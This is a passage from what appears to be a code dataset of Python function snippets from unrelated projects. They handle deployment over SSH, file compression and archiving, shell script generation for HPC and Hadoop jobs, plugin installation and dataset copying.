] )\n if s != 0 :\n print 'Unable to upload files.'\n return s\n\n # Copy the tar file up to the server\n s = scp_call( server, identity, tmp_file, tmp_tarfilepath )\n if s != 0 :\n print 'Unable to upload files.'\n return s\n\n # Unpack the tar file on the server\n s = ssh_call( server,\n identity,\n 'cd ' + tgt_dir + ' && sudo tar xzf ' + tmp_file + ' && rm ' + tmp_file + ' && sudo chown -R root:root *' )\n return s", "def run(self):\n for lof in self.data_files:\n if lof[0]:\n base = getattr(self, 'install_' + lof[0])\n else:\n base = getattr(self, 'install_base')\n dir = convert_path(lof[1])\n if not os.path.isabs(dir):\n dir = os.path.join(base, dir)\n elif self.root:\n dir = change_root(self.root, dir)\n self.mkpath(dir)\n\n files = lof[2]\n if len(files) == 0:\n # If there are no files listed, the user must be\n # trying to create an empty directory, so add the\n # directory to the list of output files.\n self.outfiles.append(dir)\n else:\n # Copy files, adding them to the list of output files.\n for f in files:\n f = convert_path(f)\n (out, _) = self.copy_file(f, dir)\n #print \"DEBUG: \", out # dbg\n self.outfiles.append(out)\n \n\n return self.outfiles", "def _compress_meds_file(self, ucfilename, fzfilename):\n from os.path import basename\n\n tup=(basename(ucfilename),basename(fzfilename))\n print('compressing file: %s -> %s' % tup)\n tpath=files.expandpath(fzfilename)\n if os.path.exists(tpath):\n os.remove(tpath)\n\n tmpdir = os.path.dirname(ucfilename)\n with StagedOutFile(fzfilename,tmpdir=tmpdir) as sf:\n cmd = self['fpack_command']\n cmd = cmd.format(fname=ucfilename)\n ret=os.system(cmd)\n\n if ret != 0:\n raise RuntimeError(\"failed to compress file\")\n\n print('output is in:',fzfilename)", "def gzip_files(topDir, afni_file,localizerfile):\n\n print 'GZIPPING FILES...'\n\n command1 = \"gzip %s*BRIK\" % (topDir)\n command2 = \"gzip %s*HEAD\" % (topDir)\n command3 = \"gzip %s%s/pb00*\" % (topDir,afni_file)\n command4 = \"gzip %s%s/errts*\" % (topDir,afni_file)\n command5 = \"gzip %s%s/fitts*\" % (topDir,afni_file)\n command6 = \"gzip %s%s/*al*\" % (topDir,afni_file)\n command7 = \"gzip %s%s/*ns*\" % (topDir,afni_file)\n command8 = \"gzip %s%s/all_runs*\" % (topDir,afni_file)\n command9 = \"gzip %s%s/*mask*\" % (topDir,afni_file)\n command10 = \"gzip %s*nii\" % (topDir)\n command11 = \"gzip %s%s/pb01*\" % (topDir,afni_file)\n command12 = \"gzip %s%s/pb03*\" % (topDir,afni_file)\n command13 = \"gzip %s%s/pb02*\" % (topDir,afni_file)\n\n os.system(command1)\n os.system(command2)\n os.system(command3)\n os.system(command4)\n os.system(command5)\n os.system(command6)\n os.system(command7)\n os.system(command8)\n #os.system(command9)\n os.system(command10)\n os.system(command11)\n try:\n os.system(command12)\n except:\n print 'Could not gzip pb03 files'\n\n if localizerfile == 'facescene_loc':\n os.system(command13)", "def scriptGen(self,tmpd='/tmp/jose',libRev='last',submode='qsub',\n redirect=1,PBSoptions=''):\n jobname=self.name\n outdir=self.outd\n qsubdir=scratchdir+'/qsub/'+todayDate() #subdirectory to deposit the script\n if not os.path.exists(qsubdir): pastry('/bin/mkdir -p '+qsubdir)\n script=qsubdir+'/'+jobname+'.sh' #full script file name\n\n if len(jobname) > 15:\n sys.stderr.write('Error: job name '+jobname+' cannot exceed 15 characters')\n return ''\n if not os.path.exists(outdir): os.system('/bin/mkdir -p '+outdir)\n buf=''\n ulimit=int(float(mem_limit)*1024) #maximum resident memory size (Kb) to prevent swapping\n wd=tmpd+'/${PBS_JOBID}'\n #wd=tmpd+'/'+ 
re.compile('\\W').sub('',self.name) +'_$$' #working directory\n logname=jobname+'.log'\n local_log=wd+'/'+logname\n remote_log=outdir+'/'+logname\n buf= '#!/bin/bash\\n\\n'\n buf+= PBSoptions+'\\n\\n'\n buf+= '#bash function to update library\\n'\n buf+= self.updateNodeLib(libRev)+'\\n\\n'\n buf+= '#bash function to import temporary libs\\n'\n buf+= self.shared_temporal_libraries()+'\\n\\n'\n buf+= '#bash function to clean exit\\n'\n buf+= self.cleanup_exit(submode=submode)+'\\n\\n'\n buf+= 'echo \"'+script+'\"\\n' #write script name withing script body\n buf+= 'hostname\\n' #node where job will be run\n buf+= 'echo $PBS_JOBID\\n'\n buf+= 'ulimit -m '+`ulimit`+' #maximum memory\\n'\n buf+= 'source ~/.bash_profile >/dev/null #environment variables\\n'\n buf+= 'wd='+wd+' #working directory\\n'\n buf+= '/bin/mkdir -p $wd\\n'\n buf+= 'export LOCAL_LOG=\"'+local_log+'\"\\n'\n buf+= '/bin/touch $LOCAL_LOG\\n'\n if submode=='sub' and redirect:\n buf+='exec &> $LOCAL_LOG #redirect STODOUT, STDERR to LOCAL_LOG\\n' \n buf+= 'export REMOTE_LOG=\"'+remote_log+'\"\\n'\n\n but+= '#clean up old log file\\n'\n buf+= 'if [ -f $REMOTE_LOG ]; then\\n' \n buf+= ' /bin/rm -f $REMOTE_LOG\\n'\n buf+= 'fi\\n\\n'\n\n buf+= 'trap \"cleanup_exit 1\" TERM #in case of killing job\\n\\n'\n\n buf+= '#update node code library && import libraries\\n'\n buf+= 'if !('\n buf+= 'updateNodeLib && ' \n buf+= 'shared_temporal_libraries _PREPARE_'\n buf+= ');then\\n'\n buf+= ' cleanup_exit 1\\n'\n buf+= 'fi\\n\\n'\n \n buf+= '/bin/cp '+' '.join(self.inpl)+' $wd #bring input files\\n' \n buf+= 'cd $wd\\n\\n'\n buf+= '#Test command success\\n'\n buf+= 'exs=0 #variable holding script exit status\\n'\n buf+= 'if !('\n buf+= self.exe\n buf+= ');then\\n'\n buf+= ' exs=1\\n'\n buf+= 'fi\\n\\n'\n buf+= '#move even partial results (exs=1)\\n'\n buf+= '/bin/mv '+' '.join(self.outl)+' '+outdir+'\\n'\n buf+= 'cleanup_exit $exs'\n\n open(script,'w').write(buf)\n pastry('chmod u+x '+script)\n\n return script", "def createbash(self,executable,**keywords):\n\t\timport os\n\t\timport stat\n\n\t\toutputname = os.path.join(\"Results\",self.outputfile.replace(\".root\",\"_${SGE_TASK_ID}.root\"))\n\t\t# Extract the input files\n\t\tinputfiles = \"\"\n\t\tfor f in self.inputfiles:\n\t\t\tinputfiles += f+\",\"\n\t\tinputfiles = inputfiles[:-1]\n\n\t\tlines = \"#!/bin/bash\\n\"\n\t\tlines += \"\\n# Script created automatically by skimfiles.py utility\\n\"\n\t\tlines += \"\\nmkdir -p Results\\n\"\n\t\tlines += \"export PATH=$PATH:\"+os.path.join(self.basedir,\"bin\")+\":\"+os.path.join(self.pkgpath,\"bin\")+\"\\n\"\n\t\tlines += \"export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:\"+self.libsdir+\"\\n\"\n\t\tlines += \"\\n\"\n\t\tlines += \"EVENTFILE=\"+self.eventsfile+\"\\n\"\n\t\tlines += \"EVENTS=$(cat $EVENTFILE | head -n $SGE_TASK_ID | tail -n 1)\\n\"\n\t\tlines += executable+\" \"+self.cutid+\" -i \"+inputfiles+\" -c \"+self.cutfile+\\\n\t\t\t\t\" -e $EVENTS -o \"+outputname+\"\\n\"\n\t\n\t\tfilename = self.nameID+\".sh\"\n\t\tf = open(filename,\"w\")\n\t\tf.writelines(lines)\n\t\tf.close()\n\t\tos.chmod(filename,stat.S_IRWXU+stat.S_IRGRP+stat.S_IXGRP+stat.S_IXOTH)\n\t\t\n\t\treturn filename", "def create_sh_script(\n unblur_path, input_image, output_dir,\n input_dir, input_suffix, options\n ):\n strSh = ''\n\n # To make sure it is a bash script\n strSh += '#!/bin/bash\\n\\n'\n\n # Export number of threads\n strSh += 'export OMP_NUM_THREADS={:d}\\n'.format(options.nr_threads)\n\n # The script will abort with non-zero exit values\n strSh += '# The script will 
abort with non-zero exit values\\n'\n strSh += 'set -e\\n'\n\n # Create a file list of all files\n strSh += '# Create a file list of all files\\n'\n strSh += 'fileList=$(ls {:s})\\n'.format(\n input_image\n )\n\n # Create folders\n strSh += '# Create folders\\n'\n strSh += 'mkdir -p {:s}/Doseuncorrected\\n'.format(output_dir)\n\n strSh += 'mkdir -p {:s}/Shift\\n'.format(output_dir)\n\n strSh += 'mkdir -p {:s}/Temp\\n'.format(output_dir)\n\n if options.filter_sum:\n strSh += 'mkdir -p {:s}/Filtered\\n'.format(output_dir)\n\n if options.dose_filter:\n strSh += 'mkdir -p {:s}/Dosecorrected\\n'.format(output_dir)\n\n if options.expert_mode:\n strSh += 'mkdir -p {:s}/FRC\\n\\n'.format(output_dir)\n\n # Abort script if files in Doseuncorrected already exists\n strSh += '# Abort script if files in Doseuncorrected already exists\\n'\n strSh += 'for f in {:s}/Doseuncorrected/*\\n'.format(output_dir)\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'echo \"Some files already exists, please choose another output directory\"\\n'\n strSh += 'exit 1\\n'\n strSh += 'break\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Abort script if files in shift already exists\n strSh += '# Abort script if files in shift already exists\\n'\n strSh += 'for f in {:s}/Shift/*\\n'.format(output_dir)\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'echo \"Some files already exists, please choose another output directory\"\\n'\n strSh += 'exit 1\\n'\n strSh += 'break\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Abort script if files in Dosecorrected already exists\n strSh += '# Abort script if files in Dosecorrected already exists\\n'\n strSh += 'for f in {:s}/Dosecorrected/*\\n'.format(output_dir)\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'echo \"Some files already exists, please choose another output directory\"\\n'\n strSh += 'exit 1\\n'\n strSh += 'break\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Abort script if files in Filtered already exists\n strSh += '# Abort script if files in Filtered already exists\\n'\n strSh += 'for f in {:s}/Filtered/*\\n'.format(output_dir)\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'echo \"Some files already exists, please choose another output directory\"\\n'\n strSh += 'exit 1\\n'\n strSh += 'break\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Abort script if files in FRC already exists\n strSh += '# Abort script if files in FRC already exists\\n'\n strSh += 'for f in {:s}/FRC/*\\n'.format(output_dir)\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'echo \"Some files already exists, please choose another output directory\"\\n'\n strSh += 'exit 1\\n'\n strSh += 'break\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Loop over all files\n strSh += '\\nfor file in $fileList\\ndo\\n\\n'\n\n strSh += 'baseName=${{file%{:s}}}\\n'.format(input_suffix)\n strSh += 'baseName=${{baseName#{:s}}}\\n'.format(input_dir)\n\n # Create a temporary file to work with to prevent format issues\n strSh += '# Create a temporary file to work with to prevent format issues\\n'\n strSh += 'e2proc3d.py $file {:s}/Temp/${{baseName}}_temp.mrc\\n\\n'.format(output_dir)\n\n # Remove some temporary files that unblur makes\n strSh += '# Remove some temporary files that unblur makes\\n'\n strSh += 'for f in .UnBlur*\\n'\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'rm .UnBlur*\\n'\n strSh 
+= 'break\\n'\n strSh += 'else\\n'\n strSh += 'true\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Start Unblur without dose correction\n strSh += '{:s} << eof\\n'.format(unblur_path)\n\n # Input File\n strSh += '{:s}/Temp/${{baseName}}_temp.mrc\\n'.format(output_dir)\n # Number of Frames\n strSh += '{:d}\\n'.format(options.nr_frames)\n # Sum File\n strSh += '{:s}/Doseuncorrected/${{baseName}}{:s}.mrc\\n'.format(\n output_dir,\n options.sum_suffix\n )\n # Shift File\n strSh += '{:s}/Shift/${{baseName}}{:s}.txt\\n'.format(\n output_dir,\n options.shift_suffix\n )\n # Pixel Size\n strSh += '{:f}\\n'.format(options.pixel_size)\n\n # Say no to Dose Filtering\n strSh += 'NO\\n'\n\n if options.save_frames:\n # Say yes to Save Frames\n strSh += 'YES\\n'\n # Frames file\n strSh += '{:s}/Doseuncorrected/${{baseName}}{:s}{:s}.mrc\\n'.format(\n output_dir,\n options.sum_suffix,\n options.frames_suffix\n )\n else:\n # Say no to Save Frames\n strSh += 'NO\\n'\n\n if options.expert_mode:\n # Say yes to Expert Mode\n strSh += 'YES\\n'\n # FRC File\n strSh += '{:s}/FRC/${{baseName}}{:s}.txt\\n'.format(\n output_dir,\n options.frc_suffix\n )\n # Minimum Shift for initial search\n strSh += '{:f}\\n'.format(options.shift_initial)\n # Outer Radius Shift Limit\n strSh += '{:f}\\n'.format(options.shift_radius)\n # B-Factor to Apply\n strSh += '{:f}\\n'.format(options.b_factor)\n # Half-Width Vertical\n strSh += '{:d}\\n'.format(options.fourier_vertical)\n # Hald-Width Horizontal\n strSh += '{:d}\\n'.format(options.fourier_horizontal)\n # Termination Shift Threshold\n strSh += '{:f}\\n'.format(options.shift_threshold)\n # Maximum Iterations\n strSh += '{:d}\\n'.format(options.iterations)\n # Restore Noise Power\n if options.restore_noise:\n # Say yes to Restore Noise Power\n strSh += 'YES\\n'\n else:\n # Say no to Restore Noise Power\n strSh += 'NO\\n'\n # Verbose Output\n if options.verbose:\n # Say yes to Verbose Output\n strSh += 'YES\\n'\n else:\n # Say no to Verbose Output\n strSh += 'NO\\n'\n else:\n # Say no to Expert Mode\n strSh += 'NO\\n'\n\n # Enf of file reached\n strSh += 'eof\\n\\n'\n\n # Remove some temporary files that unblur makes\n strSh += 'for f in .UnBlur*\\n'\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'rm .UnBlur*\\n'\n strSh += 'break\\n'\n strSh += 'else\\n'\n strSh += 'true\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # =========== #\n if options.dose_filter:\n\n # Start Unblur with dose correction\n strSh += '{:s} << eof\\n'.format(unblur_path)\n\n # Input File\n strSh += '{:s}/Temp/${{baseName}}_temp.mrc\\n'.format(output_dir)\n # Number of Frames\n strSh += '{:d}\\n'.format(options.nr_frames)\n # Sum File\n strSh += '{:s}/Dosecorrected/${{baseName}}{:s}.mrc\\n'.format(\n output_dir,\n options.sum_suffix\n )\n # Shift File\n strSh += '{:s}/Shift/${{baseName}}{:s}.txt\\n'.format(\n output_dir,\n options.shift_suffix\n )\n # Pixel Size\n strSh += '{:f}\\n'.format(options.pixel_size)\n\n # Say yes to Dose Filtering\n strSh += 'YES\\n'\n # Exposure per Frame\n strSh += '{:f}\\n'.format(options.exposure_per_frame)\n # Acceleration Voltage\n strSh += '{:f}\\n'.format(options.voltage)\n # Pre Exposure\n strSh += '{:f}\\n'.format(options.pre_exposure)\n\n if options.save_frames:\n # Say yes to Save Frames\n strSh += 'YES\\n'\n # Frames file\n strSh += '{:s}/Dosecorrected/${{baseName}}{:s}{:s}.mrc\\n'.format(\n output_dir,\n options.sum_suffix,\n options.frames_suffix\n )\n else:\n # Say no to Save Frames\n strSh += 'NO\\n'\n\n if 
options.expert_mode:\n # Say yes to Expert Mode\n strSh += 'YES\\n'\n # FRC File\n strSh += '{:s}/FRC/${{baseName}}{:s}.txt\\n'.format(\n output_dir,\n options.frc_suffix\n )\n # Minimum Shift for initial search\n strSh += '{:f}\\n'.format(options.shift_initial)\n # Outer Radius Shift Limit\n strSh += '{:f}\\n'.format(options.shift_radius)\n # B-Factor to Apply\n strSh += '{:f}\\n'.format(options.b_factor)\n # Half-Width Vertical\n strSh += '{:d}\\n'.format(options.fourier_vertical)\n # Hald-Width Horizontal\n strSh += '{:d}\\n'.format(options.fourier_horizontal)\n # Termination Shift Threshold\n strSh += '{:f}\\n'.format(options.shift_threshold)\n # Maximum Iterations\n strSh += '{:d}\\n'.format(options.iterations)\n # Restore Noise Power\n if options.restore_noise:\n # Say yes to Restore Noise Power\n strSh += 'YES\\n'\n else:\n # Say no to Restore Noise Power\n strSh += 'NO\\n'\n # Verbose Output\n if options.verbose:\n # Say yes to Verbose Output\n strSh += 'YES\\n'\n else:\n # Say no to Verbose Output\n strSh += 'NO\\n'\n else:\n # Say no to Expert Mode\n strSh += 'NO\\n'\n\n # Enf of file reached\n strSh += 'eof\\n\\n'\n\n # Remove temporary file\n strSh += 'rm {:s}/Temp/${{baseName}}_temp.mrc\\n'.format(output_dir)\n\n # Remove some temporary files that unblur makes\n # Remove some temporary files that unblur makes\n strSh += 'for f in .UnBlur*\\n'\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'rm .UnBlur*\\n'\n strSh += 'break\\n'\n strSh += 'else\\n'\n strSh += 'true\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n if options.filter_sum:\n # Filter Images\n lowpass_angstrom = options.pixel_size / options.lowpass\n highpass_angstrom = options.pixel_size / options.highpass\n strSh += \\\n 'e2proc3d.py {:s}/Doseuncorrected/${{baseName}}{:s}.mrc '.format(\n output_dir,\n options.sum_suffix\n )\n strSh += '{:s}/Filtered/${{baseName}}{:s}.mrc ' \\\n .format(\n output_dir,\n options.sum_suffix\n )\n strSh += '--process=filter.lowpass.gauss:cutoff_freq={:f} '.format(\n options.lowpass\n )\n strSh += '--process=filter.highpass.gauss:cutoff_freq={:f}\\n\\n' \\\n .format(\n options.highpass\n )\n\n if options.remove_sum:\n # Remove sum files\n strSh += 'rm {:s}/Doseuncorrected/${{baseName}}{:s}.mrc\\n'.format(\n output_dir,\n options.sum_suffix\n )\n\n # Done\n strSh += 'done\\n\\n'\n\n # Remove temp folder\n strSh += 'rm -r {:s}/Temp\\n'.format(output_dir)\n\n strSh += 'echo \"All done!\"'\n\n # Write Output\n with open('{:s}/scriptUnblur.sh'.format(output_dir), 'w') as f:\n f.write(strSh)", "def do_install(self, args):\n if args:\n try:\n plugin_name, file_path = args.split()[0], args.split()[1]\n except Exception as e:\n return print(display_messages(\"the argument is invalid please type ?install for more information\", error=True))\n if not path.isfile(file_path):\n return print(\n display_messages(\n \"the file {} not found \".format(file_path), error=True\n )\n )\n head, tail = os.path.split(file_path)\n dest = copyfile(file_path, \"{}/{}\".format(self.temp_path, tail))\n print(display_messages(\"copy content file .zip to {}\".format(dest), info=True))\n \n path_to_zip_file = tempfile.gettempdir() + \"/{}\".format(tail)\n with ZipFile(path_to_zip_file, \"r\") as zip_ref:\n zip_ref.extractall(tempfile.gettempdir())\n temp_path_file_extracted = \"{}/{}.py\".format(self.temp_path, plugin_name)\n print(\n display_messages(\n \"extracted files on : {}\".format(temp_path_file_extracted), info=True\n )\n )\n if not path.isfile(temp_path_file_extracted):\n 
return print(\n display_messages(\n \"the file {} not found \".format(temp_path_file_extracted), error=True\n )\n )\n temp_templates_path = \"{}/{}\".format(self.temp_path, plugin_name)\n if not path.isdir(temp_templates_path):\n return print(\n display_messages(\n \"the directory template {} not found \".format(temp_templates_path), error=True\n )\n )\n source = temp_path_file_extracted\n destination = \"{}/{}.py\".format(self.captiveflask_setup_path, plugin_name)\n dest = copyfile(source, destination)\n print(display_messages(\"copy content file to {}\".format(dest), info=True))\n\n copy_tree(\n temp_templates_path, C.user_config_dir + \"/config/templates/{}\".format(plugin_name)\n )\n print(\n display_messages(\n \"plugin {} install {}\".format( plugin_name,setcolor(\"sucessful\", color=\"green\")),\n info=True,\n )\n )\n return \n print(\n display_messages(\"unknown command: {} \".format(args), error=True)\n )", "def install():\n execute(generate)\n execute(upload)", "def main():\n # Create / clean output dir\n if os.path.isdir(OUT_DIR):\n shutil.rmtree(OUT_DIR)\n os.mkdir(OUT_DIR)\n\n # Write all assets to the directory\n for fname, bb in create_assets().items():\n filename = os.path.join(OUT_DIR, fname)\n dirname = os.path.dirname(filename)\n if not os.path.isdir(dirname):\n os.makedirs(dirname)\n with open(filename, \"wb\") as f:\n f.write(bb)", "def main(args):\n\n #gets urls based on sections and creates basic directories\n stack_exchange_data = get_data(args.filename)\n zip_directory, corpus_directory = args.zip_path, args.dest_path\n setup(zip_directory, corpus_directory)\n\n for (section, url) in stack_exchange_data:\n #creates directories for the current SE site\n zip_file_path, unzipped_folder, corpus_section_directory = section_setup(\n section, zip_directory, corpus_directory)\n\n done_signal_path = os.path.join(corpus_section_directory, \".done\")\n if os.path.isfile(done_signal_path):\n continue\n\n print(\"Starting \" + section)\n\n #downloads and unzips data release for a site\n load(url, zip_file_path, unzipped_folder)\n\n #gets the links data from the links table for the site\n links = get_links(unzipped_folder)\n\n #gets post data from the posts table\n posts = get_posts(unzipped_folder)\n\n #gets post history\n posthistory = get_post_history(unzipped_folder)\n\n #creates the clusters of related and duplicate posts for a site,\n #based on links data\n # clusters, related, duplicates, unique_posts = gen_clusters(links)\n clusters = iter_clusters(links, posts, posthistory)\n\n #writes cluster information to json files\n write_json_files(clusters, corpus_section_directory)\n \n # put completion marker in folder so we can skip it next time\n with open(done_signal_path, \"w\") as f:\n print(\"\", file=f)\n\n print(\"Completed \" + section)", "def do_pack():\n\n datenow = datetime.now()\n full_date = datenow.strftime(\"%Y%m%d%H%M%S\")\n\n try:\n if not os.path.isdir(\"versions\"):\n local(\"mkdir versions\")\n local_command = local(\"tar -cvzf versions/web_static_{}.tgz web_static\"\n .format(full_date))\n return local_command\n except Exception:\n return None", "def createCase(foamCase, baseCase):\n if 'copyCase.sh' in os.listdir(baseCase):\n f = open('createNewCase.sh', 'w')\n writeLine = 'cd ' + baseCase + ' && ./copyCase.sh ' + foamCase \n f.write(writeLine)\n f.close()\n os.system('./createNewCase.sh')\n os.remove(os.getcwd()+'/createNewCase.sh')\n else:\n print(\"ERROR. The script 'copyCase.sh' is not present in the baseCase directory. 
Please add this\")\n return 0", "def zip_imagenet100c():\n #First make sure the directory we are given is correct!\n if not os.path.isdir(DATA_SRC_ROOT):\n raise Exception(\"Bad filepath given\")\n\n #create the destiantion directories if they don't exist\n if not os.path.isdir(IMAGENET100_DIR):\n os.mkdir(IMAGENET100_DIR)\n\n #grab the subset wnids for the 100 class-subset\n with open(IMAGENET100_CLASSES) as f:\n subset_wnids = f.readlines()\n subset_wnids = [x.strip() for x in subset_wnids] #list of the 100 WNIDs we grab\n\n #Grab the names of all of the folders inside the root data source\n #Structure is distortion/sub_distortion/level/wnids\n for distortion in os.listdir(DATA_SRC_ROOT):\n if distortion != \"meta.bin\":\n print(distortion)\n\n folder_path = os.path.join(DATA_SRC_ROOT, distortion)\n\n if not os.path.isdir(folder_path):\n continue\n\n for sub_distortion in os.listdir(folder_path):\n print(sub_distortion)\n\n subfolder_path = os.path.join(folder_path, sub_distortion)\n\n if not os.path.isdir(subfolder_path):\n continue\n\n for level in os.listdir(subfolder_path):\n print(level)\n\n level_path = os.path.join(subfolder_path, level)\n\n #grab the correcrt validation d9recotires\n for wnid in os.listdir(level_path):\n wnid_path = os.path.join(level_path, wnid)\n\n if not os.path.isdir(wnid_path):\n continue\n\n if wnid in subset_wnids:\n dest_path = os.path.join(IMAGENET100_DIR, distortion, sub_distortion, level, wnid)\n\n shutil.copytree(wnid_path, dest_path)\n\n #copy the metadata bin file\n meta_file = os.path.join(DATA_SRC_ROOT, 'meta.bin')\n meta_dest = os.path.join(IMAGENET100_DIR, 'meta.bin')\n\n shutil.copy(meta_file, meta_dest)\n\n #Zip the destinatio file\n shutil.make_archive(ZIP_PATH + '/ImageNet100C', 'tar', IMAGENET100_DIR)", "def runUploads():\n os.system(\"chmod u+x uploadCommands.sh\")\n os.system(\"./uploadCommands.sh\")\n os.system(\"rm uploadCommands.sh\")", "def output_transfer_prep(wcl, jobfiles, putinfo, task_label, exitcode):\n\n mastersave = wcl.get(pfwdefs.MASTER_SAVE_FILE).lower()\n mastercompress = wcl.get(pfwdefs.MASTER_COMPRESSION)\n if miscutils.fwdebug_check(3, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"%s: mastersave = %s\" % (task_label, mastersave))\n miscutils.fwdebug_print(\"%s: mastercompress = %s\" % (task_label, mastercompress))\n\n # make archive rel paths for transfer\n saveinfo = {}\n for key, fdict in putinfo.items():\n if miscutils.fwdebug_check(3, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"putinfo[%s] = %s\" % (key, fdict))\n should_save = pfwutils.should_save_file(mastersave, fdict['filesave'], exitcode)\n if should_save:\n if 'path' not in fdict:\n miscutils.fwdebug_print(\"Error: Missing path (archivepath) in file definition\")\n print key, fdict\n sys.exit(1)\n should_compress = pfwutils.should_compress_file(mastercompress,\n fdict['filecompress'],\n exitcode)\n fdict['filecompress'] = should_compress\n fdict['dst'] = \"%s/%s\" % (fdict['path'], os.path.basename(fdict['src']))\n saveinfo[key] = fdict\n\n call_compress_files(wcl, jobfiles, saveinfo)\n if miscutils.fwdebug_check(3, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"After compress saveinfo = %s\" % (saveinfo))\n\n return saveinfo", "def _generate_hadoop_shell_script(arg_list, shell_env, working_dir, turi_dist_path, **kwargs):\n script_file = tempfile.NamedTemporaryFile(delete=False)\n logger.debug(\"script file name: \" + script_file.name)\n\n filenames_needed = ['dml_commander_startup',\n 'dml_worker_startup',\n 'libdml_toolkits.so',\n 
'libdml_shared.so',\n 'libhdfs.so',\n 'libminipsutil.so',\n 'libc++abi.so.1']\n\n copy_cmd = \"hadoop fs -copyToLocal \" + turi_dist_path + \"/\"\n for i in filenames_needed:\n script_file.write(copy_cmd + DD_BINS_PATH + i + '\\n')\n\n script_file.write(\"chmod 755 ./dml_commander_startup\\n\")\n script_file.write(\"chmod 755 ./dml_worker_startup\\n\")\n script_file.write(\"export LD_LIBRARY_PATH=${JAVA_HOME}/jre/lib/amd64/server:${LD_LIBRARY_PATH}\\n\")\n script_file.write(\"export CLASSPATH=$(hadoop classpath --glob)\\n\")\n for k, v in shell_env.items():\n script_file.write(\"export %s=%s\\n\" % (str(k), str(v)))\n\n script_file.write(\"env\\n\")\n #script_file.write(\"if [ $MY_RANK -eq 0 ]; then\\n\")\n #script_file.write(\" stress --vm-bytes 4g --vm-keep -m 1 --timeout 30\\n\")\n #script_file.write(\"fi\\n\")\n script_file.write(\"if [ $MY_RANK -eq 0 ]; then\\n\")\n script_file.write(\" echo Starting commander\\n\")\n script_file.write(\" ./dml_commander_startup \")\n for arg in arg_list[0]:\n if len(arg) > 7 and arg[0:7] == \"--args=\":\n script_file.write(arg[0:7] + '\"' + arg[7:] + '\" ')\n else:\n script_file.write(arg + \" \")\n script_file.write(\"> >(tee commander.log.stdout) 2> >(tee commander.log.stderr >&2)\")\n script_file.write(\"\\n\")\n script_file.write(\" echo Uploading commander log\\n\")\n script_file.write(\" hadoop fs -put \" + \"./commander.log.stdout \" +\n \"/\".join([working_dir, 'commander.log'])+\".stdout\\n\")\n script_file.write(\" hadoop fs -put \" + \"./commander.log.stderr \" +\n \"/\".join([working_dir, 'commander.log'])+\".stderr\\n\")\n script_file.write(\"else\\n\")\n script_file.write(\" let MY_RANK=$MY_RANK-1\\n\")\n script_file.write(\" echo Starting worker $MY_RANK\\n\")\n script_file.write(\" ./dml_worker_startup \")\n for arg in arg_list[1]:\n script_file.write(arg + \" \")\n script_file.write(\"> >(tee worker.log.stdout) 2> >(tee worker.log.stderr >&2)\")\n script_file.write(\"\\n\")\n script_file.write(\" echo Uploading worker $MY_RANK log\\n\")\n script_file.write(\" hadoop fs -put \" + \"./worker.log.stdout \" +\n \"/\".join([working_dir, \"worker_${MY_RANK}.log\"])+\".stdout\\n\")\n script_file.write(\" hadoop fs -put \" + \"./worker.log.stderr \" +\n \"/\".join([working_dir, \"worker_${MY_RANK}.log\"])+\".stderr\\n\")\n script_file.write(\"fi\\n\")\n script_file.close()\n return script_file.name", "def do_pack():\n now = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n local('mkdir -p versions')\n result = local('tar -czvf versions/web_static_{}.tgz web_static'\n .format(now))\n if result.failed:\n return None\n else:\n return result", "def create_file_structure_for_packages(root_folder, file_to_copy, object_name):\n upload_package_folder = os.path.join(\n root_folder, object_name, 'coala' + object_name)\n os.makedirs(upload_package_folder, exist_ok=True)\n touch(os.path.join(upload_package_folder, '__init__.py'))\n shutil.copyfile(file_to_copy, os.path.join(upload_package_folder,\n object_name + '.py'))", "def write_flow_csh(self):\n str = self.LicLocalPort\n fout = open(self.cshBatch2File+\".csh\",\"w\")\n fout.write(\"\"\"\\\n#!/bin/csh\n\nif ( $#argv == 0 ) then\n echo \"\"\n echo \"USAGE: $0 [-powerOnDemand] javaBatchFile.java Simulation.sim\"\n echo \"\"\n exit\nendif\n\nset powerOnDemand=0\nset javaBatchFile=$1\nset simFile=$2\nset powerOnDemandLicense=\"\"\nif ( \"$1\" == \"-powerOnDemand\" ) then\n set powerOnDemand=1\n set javaBatchFile=$2\n set simFile=$3\n set powerOnDemandLicense=\"-licpath %s@localhost -podkey %s\"\nendif\n\"\"\" 
